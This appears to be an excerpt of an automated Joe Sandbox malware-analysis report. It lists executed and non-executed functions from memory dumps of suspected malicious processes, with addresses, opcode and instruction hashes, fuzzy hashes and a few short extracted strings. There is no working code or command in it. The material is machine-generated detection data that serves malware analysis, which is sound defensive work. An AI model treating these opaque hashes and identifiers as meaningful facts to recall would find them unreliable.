                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 33917e0474da6873cc0555e741644ac9f9ad5bc996dae72b700ebac683183ec2
                • Instruction ID: a787b1320fa3728a5e7b49ef448699f15a544a21eb19aa7e00da252a620d20c0
                • Opcode Fuzzy Hash: 33917e0474da6873cc0555e741644ac9f9ad5bc996dae72b700ebac683183ec2
                • Instruction Fuzzy Hash: E6014471A1E64E4FD752A7B484995A93BE0EF56312F0645F7C408CB0B7DA38A544C711
                Function 00007FFD9B780608 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a11dd8394bb633dd76c25b3b73cf6e35b060a5a88a8490b9d0b9b03bfaa0d34b
                • Instruction ID: 18da3ddfac6971d5c3f7d7c3b34992d0d634a55c6371bf090eb16abbac476667
                • Opcode Fuzzy Hash: a11dd8394bb633dd76c25b3b73cf6e35b060a5a88a8490b9d0b9b03bfaa0d34b
                • Instruction Fuzzy Hash: A9018630A15A0E8FDB59EBA4C4A85BA73A0FF18306F51097ED41EC21F5DE35A554CA00
                Function 00007FFD9B780610 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 54b11f5bebea3bfd60f5014a7dd67f781c8a30b7a1412794803d0219a06e5b20
                • Instruction ID: 393ce38513dbe57424f2b3952624c664b9d824b7b0e284fb92cae39ce7aca3ea
                • Opcode Fuzzy Hash: 54b11f5bebea3bfd60f5014a7dd67f781c8a30b7a1412794803d0219a06e5b20
                • Instruction Fuzzy Hash: 1601D630A05A0E8EDB58EBB4C4A85B973E0FF18306F60057ED41EC21F4DE35A540CB00
                Function 00007FFD9B781230 Relevance: .0, Instructions: 40COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dc22eb5d611f3dcb6b205b4210959964d752f437e91b07235ba34849e18e0e70
                • Instruction ID: 6eebc020c78032c30673447c9c841801362349941ebef5498117d5c4ac3aeece
                • Opcode Fuzzy Hash: dc22eb5d611f3dcb6b205b4210959964d752f437e91b07235ba34849e18e0e70
                • Instruction Fuzzy Hash: 3DF08671B1AA4F49EFA49AA888B86F977E4EF59315F01063AD41DC60F1DA3457148240
                Function 00007FFD9B7805D0 Relevance: .0, Instructions: 39COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ea8134f7d5dd22558547e5f0e0cb10257b7fc1a47882f10739ca1dacbebfd5bb
                • Instruction ID: 6f11d3f8f1593accc76acecaf51586a45b731f010052d247c32ac0cd9adf206a
                • Opcode Fuzzy Hash: ea8134f7d5dd22558547e5f0e0cb10257b7fc1a47882f10739ca1dacbebfd5bb
                • Instruction Fuzzy Hash: A3F0C230A0AA4E8FEB64EE6594656FA77A0FF19306F11057AE80DC24F1CE35A660CB40
                Function 00007FFD9B78ABB8 Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5ea87a3de142a5415ebb5b4f73a9549534b16c87b4df0fb163ce31bc95f83e6e
                • Instruction ID: fa4c40d524d4fbe463519f1985d42bea4d9fa1c9824df8372e20b5054828e555
                • Opcode Fuzzy Hash: 5ea87a3de142a5415ebb5b4f73a9549534b16c87b4df0fb163ce31bc95f83e6e
                • Instruction Fuzzy Hash: 54F09039B0DA0E5FE710FBA8A4E48F937F2EF54315B114AB6D00CC70B6EE34A5844650
                Function 00007FFD9B78B364 Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1fc3381ca190a1a951c4db07273bacb1450bdbb12c353a5a6e2cf509a1c10058
                • Instruction ID: 5aa5d3e9988f7ac56f49e98f6f4a84ede25d723d1dbb6ff531d8165a2e21ec02
                • Opcode Fuzzy Hash: 1fc3381ca190a1a951c4db07273bacb1450bdbb12c353a5a6e2cf509a1c10058
                • Instruction Fuzzy Hash: 76F0FF70A1AA1D8FDBA4DB14C499BE9B3B1EF58301F1142E6D00DD3265CF35AA818F40
                Function 00007FFD9B78C1AC Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b5abc109ddcb14661d3d10235d463f3299fdd70f58bb4f697cf8bbfb878552bc
                • Instruction ID: 18876e2ceb5e985ba001d152a313d339eef2edbbea1bb313d9ad60742b336ff8
                • Opcode Fuzzy Hash: b5abc109ddcb14661d3d10235d463f3299fdd70f58bb4f697cf8bbfb878552bc
                • Instruction Fuzzy Hash: 08F03071E5AA4E8EEFA5EF6888A92FD7AA0FF14302F01053AE919C21B1DB7456508740
                Function 00007FFD9B7826E9 Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 37d1d222a9a8dca79e20c346ffdb968ffb6b0323b97fb522bb092aa933221c45
                • Instruction ID: f937735faf10d60514f75f5b15bc09f80c5f7b6a2f3538f29334653eb720733b
                • Opcode Fuzzy Hash: 37d1d222a9a8dca79e20c346ffdb968ffb6b0323b97fb522bb092aa933221c45
                • Instruction Fuzzy Hash: E1F0C23190E78D8FDB6A9B6088791A93BA0FF16302F4605BAD409C61F2EA389514C701
                Function 00007FFD9B78275D Relevance: .0, Instructions: 30COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 64a78fa5c064780ae0fecf5e99d7dc425e0b4a886db5e78addbc138b8016fae2
                • Instruction ID: 1cd5384a4e2fd9df8fddc883b86eab12bc3f7a631485c8a48993bd4cee6a1e91
                • Opcode Fuzzy Hash: 64a78fa5c064780ae0fecf5e99d7dc425e0b4a886db5e78addbc138b8016fae2
                • Instruction Fuzzy Hash: 02F0B430A0A78A8FDB599FB484652A93B60FF16202F4545BED80DCA1F2DB38A504C701
                Function 00007FFD9B781710 Relevance: .0, Instructions: 25COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0fe8a46c296d93708f61b05d60e40878e9e488cc7cac960711ac09eb02f71a12
                • Instruction ID: 5184d381838e8a8089b4dd5c86d830d8dfcfa7094479b94906cdc0600710bd16
                • Opcode Fuzzy Hash: 0fe8a46c296d93708f61b05d60e40878e9e488cc7cac960711ac09eb02f71a12
                • Instruction Fuzzy Hash: 8BE0E520F0BE0A46E774925984D557471D19F48315FBA8775F01DC65F1EB3CDE82C201
                Function 00007FFD9B78604B Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3b968759f6c0c951caad449d59be1551ebb0216a9861cdf0737bdc75161eb77f
                • Instruction ID: 313d5b26ef54f8a88d5039c6d74af1377d3cd0dc6315d55126112aa79389fd90
                • Opcode Fuzzy Hash: 3b968759f6c0c951caad449d59be1551ebb0216a9861cdf0737bdc75161eb77f
                • Instruction Fuzzy Hash: 6AE04574A59A2E9EDBA8DB48C894BB977B1FB58302F5111B9D11DD32A1DA305A808F04
                Function 00007FFD9B78E649 Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e48b8d8d78ead12cf4239562d578f06b141cb1a156202681a4e36c2d0b9765da
                • Instruction ID: 630a0b352b99c500ad212835df280e3d4635ca4dc74e761fa6b8807f5214e5ed
                • Opcode Fuzzy Hash: e48b8d8d78ead12cf4239562d578f06b141cb1a156202681a4e36c2d0b9765da
                • Instruction Fuzzy Hash: E5F0AC34A09A5D8BDB25EB04C8917AD73B6EB94302F1546A5D00D972A5CB746B818B41
                Function 00007FFD9B78BE53 Relevance: .0, Instructions: 20COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b192cd5b06488316db087836aa4ddda2474db24bc0158c281008add675c9bdd3
                • Instruction ID: 92e7dd44096eb567c5780a72d3b0cc3094c2e3b84c6ea81aaf4c43f33e5d6a52
                • Opcode Fuzzy Hash: b192cd5b06488316db087836aa4ddda2474db24bc0158c281008add675c9bdd3
                • Instruction Fuzzy Hash: 24E052B0E0960E9FDB28DF94D4E55FDB7B1BF14301F610539E419A32B1CA3869508B40
                Function 00007FFD9B78BF1F Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28bdbf73e458c66e6c73acbfe0d9b65e8ec568619fc3506dfaa08a2ca4efe61c
                • Instruction ID: ef946c5ff71a100aa638b4bec67e8d4e1f3a178f76cd03da9d02765a4a7e5887
                • Opcode Fuzzy Hash: 28bdbf73e458c66e6c73acbfe0d9b65e8ec568619fc3506dfaa08a2ca4efe61c
                • Instruction Fuzzy Hash: BDD0E231A0894D8ECF50EFC8D4809ECBBB0EF58301F000022D10CD2260CA30A4508B40

                Non-executed Functions

                Function 00007FFD9B78FA09 Relevance: 6.3, Strings: 5, Instructions: 95COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: '$H$U$[$i
                • API String ID: 0-3970984591
                • Opcode ID: 1038e454c1c1a2dfc0abafdae40b95744a7679b55e81dde3abd8c4275def21d0
                • Instruction ID: 5dcce3a1f6a5be307a1df0a6d7c3ae21bd6ff14f56ae1f5023227ff9755862ee
                • Opcode Fuzzy Hash: 1038e454c1c1a2dfc0abafdae40b95744a7679b55e81dde3abd8c4275def21d0
                • Instruction Fuzzy Hash: F641B470E09A6E8EDBA4DF54C8947EDB7B1AF58302F0046EAD40DE62A1DB745A808F41
                Function 00007FFD9B78EBC6 Relevance: 5.1, Strings: 4, Instructions: 90COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: "$A$L$\
                • API String ID: 0-4177883558
                • Opcode ID: 4d1d45387c7b8343f1dc999f694d8d040ac03ee51de334f83e2cd765078e58e9
                • Instruction ID: bc27a8e51c7699a60306ebf18e3fbb4e68b9c4402542964d901416e8540d9098
                • Opcode Fuzzy Hash: 4d1d45387c7b8343f1dc999f694d8d040ac03ee51de334f83e2cd765078e58e9
                • Instruction Fuzzy Hash: 6341D570E0966D8BDB64DF54D894BEDB7B1FB58301F0046EAD40DA72A1CB786A818F44

                Executed Functions

                Function 00007FFD9B79177F Relevance: 5.1, Strings: 4, Instructions: 131COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b791000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: "$+$/$]
                • API String ID: 0-387013541
                • Opcode ID: db89f9d211b9fa6e6ec247edfa98c3d334e124217f62501f17233b9cbf114412
                • Instruction ID: 2662eef6a6358f37c393ac5193bea78ac238854052052fa05af28edf99ac7e58
                • Opcode Fuzzy Hash: db89f9d211b9fa6e6ec247edfa98c3d334e124217f62501f17233b9cbf114412
                • Instruction Fuzzy Hash: 9951D770E0932D8FEB68DF94C8A47EDB6B1AF54301F4142BAD00DA76A1CB385A84DF11
                Function 00007FFD9B7816A8 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: UAVW
                • API String ID: 0-3038902782
                • Opcode ID: 936950452c2ee8172b7861a8f0df3be34d5940d88a6ef245b43a2de98891f5c7
                • Instruction ID: 7f33a4bdd5fa05d1017daca2486dbb008da4106fbe8cecb9178a5a5039a65b57
                • Opcode Fuzzy Hash: 936950452c2ee8172b7861a8f0df3be34d5940d88a6ef245b43a2de98891f5c7
                • Instruction Fuzzy Hash: 1981BE31B0DF494FDB59DE5C88A16A977E2EF98301B15067EE45EC32A2DE34A9028781
                Function 00007FFD9B78C8DD Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b78a000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: _
                • API String ID: 0-701932520
                • Opcode ID: 77d2f5fa6213612cffd89be8029aa62747a96f7e3673fd0f0c257cd024c943da
                • Instruction ID: 5cf4159ee7b88a3ddc49f9ae3819611df2f69901f5444f86c4dc318afd73c0a1
                • Opcode Fuzzy Hash: 77d2f5fa6213612cffd89be8029aa62747a96f7e3673fd0f0c257cd024c943da
                • Instruction Fuzzy Hash: CD51282B74DA2A4AE7547BBCB8914FD7340EF90376F044277E10DC90A7DE3825468AD1
                Function 00007FFD9B781C7D Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: UAVW
                • API String ID: 0-3038902782
                • Opcode ID: 9788fc4f12b6a6153f8fb75c4d51095830cd95d576a3dd673e6e968e69c586a3
                • Instruction ID: dd57e33121059b74bf564adb196707601093a4c39fcfff9eec88c30b9ee3a1c4
                • Opcode Fuzzy Hash: 9788fc4f12b6a6153f8fb75c4d51095830cd95d576a3dd673e6e968e69c586a3
                • Instruction Fuzzy Hash: 35510630B18B894FDB5CDE1888A16B977E2FF98301F15467ED45EC72A1CE34A802C781
                Function 00007FFD9B782095 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: WVSH
                • API String ID: 0-4131290416
                • Opcode ID: fb62c6f272e3da4ee261e15cf129157780f69435ada02b70500d7899fefe63e9
                • Instruction ID: 7873a7e5ca7f1d5a0c86389f74e035a1034983931cf20cd5d5657d476e5db999
                • Opcode Fuzzy Hash: fb62c6f272e3da4ee261e15cf129157780f69435ada02b70500d7899fefe63e9
                • Instruction Fuzzy Hash: 39415831F0EA4A4FD396DBB884A55B877E0EF85302F0642BAD44CC31B6DE38A9428341
                Function 00007FFD9B78F69F Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B78F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b78f000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: k
                • API String ID: 0-140662621
                • Opcode ID: efd69adf408d3db26481dd05ea9a33384773204ac18f5fa379077791c8dadf94
                • Instruction ID: 7ea361752cc0cedbe082f606de06f9adcd2a0153b9d10731f4a6d65aae9ab86b
                • Opcode Fuzzy Hash: efd69adf408d3db26481dd05ea9a33384773204ac18f5fa379077791c8dadf94
                • Instruction Fuzzy Hash: 7701F630E09B2E8FEB64DF04C8907E9B7B5EB54311F1046E9D40DA62A1DB745B80CF40
                Function 00007FFD9B793318 Relevance: .5, Instructions: 470COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b791000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b26b49dc57293ec1db87532784750cc1ee35c39b263ba9aa4a6095a94a1f49e5
                • Instruction ID: 2850350267615efefb06f7bd6c04a0da5fc0c36adceb174685fa30ff41ff68de
                • Opcode Fuzzy Hash: b26b49dc57293ec1db87532784750cc1ee35c39b263ba9aa4a6095a94a1f49e5
                • Instruction Fuzzy Hash: A521E421E0E7CA4FE712AB748C685A97FF0BF12300B0A05FBD458C71B7D928AA14C761
                Function 00007FFD9B793328 Relevance: .5, Instructions: 451COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b791000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6ff1b252eb3da7a4877b3ec08b4278c503df52144e94b5d6d9b176421b7708ab
                • Instruction ID: 962eb3159ad13e01ef52d8c4b8d84d7cb185cf4d70493e5e051e8d61bada3e06
                • Opcode Fuzzy Hash: 6ff1b252eb3da7a4877b3ec08b4278c503df52144e94b5d6d9b176421b7708ab
                • Instruction Fuzzy Hash: 18118161A0F7CA4FE7129B744C795A97FB0AF12204F0A05FBD498CB1E3D9186918C762
                Function 00007FFD9B78DA29 Relevance: .4, Instructions: 431COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b78a000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 177d46c7f69f6a2e919b4deeff3e9c28d4ed65b217a1774f84eb8e6cdb3ad1de
                • Instruction ID: e3d926fab88f4ba1f4c25f4f30206554a7f497612688f53459ed9c092f8d26de
                • Opcode Fuzzy Hash: 177d46c7f69f6a2e919b4deeff3e9c28d4ed65b217a1774f84eb8e6cdb3ad1de
                • Instruction Fuzzy Hash: B4F13C71E19A5D8FEB68EFA8C4A57B8B7A1FF58301F1401BED01DD32A6DA346940CB41
                Function 00007FFD9B780525 Relevance: .4, Instructions: 388COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5bbb1c7557a3c8233416042de89009a4fe415be26d13c9cdb34a4febc4362da2
                • Instruction ID: 1a2f7f78d3e6036ff0c3a7f86a3e4431b457c62d3b1ceeb8e121a0eb34fdf35e
                • Opcode Fuzzy Hash: 5bbb1c7557a3c8233416042de89009a4fe415be26d13c9cdb34a4febc4362da2
                • Instruction Fuzzy Hash: 85B13747B0FBDA0EE72076AC78B54F97B50DF5263270D43F7E0998A0F79C2869068291
                Function 00007FFD9B7805A0 Relevance: .3, Instructions: 317COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 169e1026a133196da420e0e221db97e6538303b943ca3aa72e9789c6d224a196
                • Instruction ID: ab982a3bafb96f41e95c59adf522d5fe10d2b5a9220b81a5ef12b1335086e05c
                • Opcode Fuzzy Hash: 169e1026a133196da420e0e221db97e6538303b943ca3aa72e9789c6d224a196
                • Instruction Fuzzy Hash: AF912A43B0FBDA0EE72166BC28B50F93B91DF5266570D43F7E0994A0F7EC2869468281
                Function 00007FFD9B78060D Relevance: .3, Instructions: 293COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 59a146d09d96d0571238dbc5999cc459a1c23e20cbc726ba430040fc8b54a8e1
                • Instruction ID: 2f20544727e28ba24b1f2f03539a9c89b3434c3773969e0e4b8310c92deaf694
                • Opcode Fuzzy Hash: 59a146d09d96d0571238dbc5999cc459a1c23e20cbc726ba430040fc8b54a8e1
                • Instruction Fuzzy Hash: EC811B43B0FBC60FE72166BC68B50F97B91DF5266170D43F7E0994A0F7DC2969468281
                Function 00007FFD9B780638 Relevance: .3, Instructions: 288COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 17db82bba05b523cbd3662c4f0e6da3453d4e21a6ea39940aac2d69346dd1ebc
                • Instruction ID: 4ec0946da176330443587abb5550b1435ebd50c463c822f8bf046b96544d7471
                • Opcode Fuzzy Hash: 17db82bba05b523cbd3662c4f0e6da3453d4e21a6ea39940aac2d69346dd1ebc
                • Instruction Fuzzy Hash: 8C814B53B0FBCA0FE72166BC68A54F97B91EF5266170D43F7E0988A0F7DC2469468381
                Function 00007FFD9B780640 Relevance: .3, Instructions: 266COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ca1e82e3d274863d105baf8d385e36fcd451fba09d29bfa63be997daa22b8a56
                • Instruction ID: f87dbc5d196bb0ec18b0001d0d51be9a1cf45e268456ef96bdd651aaa61352ab
                • Opcode Fuzzy Hash: ca1e82e3d274863d105baf8d385e36fcd451fba09d29bfa63be997daa22b8a56
                • Instruction Fuzzy Hash: E9712943B0FBC60FE72166BC28A50F97B91EF5266170D43F7E0A94A0F7EC2569068385
                Function 00007FFD9B793B85 Relevance: .2, Instructions: 216COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b791000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d057df1726f84f6b4c41b53c0005bbaf8dc377c7e45f40aba75dd0600143986d
                • Instruction ID: 4c6ee48d77db40e149236156bf0054eb84518cc059851daeaeaa2b37ff130a2a
                • Opcode Fuzzy Hash: d057df1726f84f6b4c41b53c0005bbaf8dc377c7e45f40aba75dd0600143986d
                • Instruction Fuzzy Hash: 1991BC70E1961D9EEBA4DB98C8957ADB6F1FF58300F5142BAD00DE32A1DB346A84CB11
                Function 00007FFD9B783155 Relevance: .2, Instructions: 172COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000010.00000002.1892391709.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_16_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9ca499bef5267352bfde6d1fe9e2221f7ad14f61284ad257133a79c91769d8b7
                • Instruction ID: 1a700db851b9f151cd06441f339a5e943a28ee604d58234efb40c12f0832034d
                • Opcode Fuzzy Hash: 9ca499bef5267352bfde6d1fe9e2221f7ad14f61284ad257133a79c91769d8b7
